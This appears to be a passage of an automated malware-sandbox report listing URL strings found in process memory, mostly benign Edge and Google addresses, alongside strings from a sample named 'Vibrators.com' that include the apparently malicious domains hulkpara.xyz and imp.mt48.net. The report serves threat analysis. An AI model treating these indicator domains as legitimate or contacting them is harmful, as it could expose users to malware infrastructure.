Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log0.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr, HubApps Icons.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://gaana.com/
Source: chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$
Source: chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
Source: chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
Source: chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000000F.00000003.1904536753.00004D2C00878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1959211329.000016CC01910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1959157869.000016CC0190C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: msedge.exe, 00000015.00000002.2060738440.00007B60003AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2210399664.00001040002D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: Vibrators.com, 0000000B.00000002.2507233828.00000000039FD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hulkpara.xyz
Source: Vibrators.com, 0000000B.00000002.2505005731.000000000373B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hulkpara.xyz/
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hulkpara.xyzZMYMO
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003A8D000.00000040.00001000.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2507233828.0000000003A2C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hulkpara.xyzh;
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000000F.00000003.1965601541.000016CC01354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/
Source: chrome.exe, 0000000F.00000003.1953477908.000016CC01C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000000F.00000003.1953477908.000016CC01C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000000F.00000003.1903940051.00004D2C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1903783349.00004D2C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000000F.00000003.1966072298.000016CC01640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966560548.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965885038.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966072298.000016CC01630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965652470.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966610265.000016CC01ED8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: chrome.exe, 0000000F.00000003.1931234222.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931501095.000016CC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 0000000F.00000003.1931234222.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931501095.000016CC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000000F.00000003.1904590071.00004D2C00880000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000000F.00000003.1955543917.00004D2C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1952002309.000016CC01590000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
Source: chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://m.kugou.com/
Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: https://m.soundcloud.com/
